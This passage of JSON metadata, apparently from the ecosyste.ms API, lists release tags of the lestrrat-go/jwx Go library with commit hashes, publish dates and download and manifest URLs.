ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind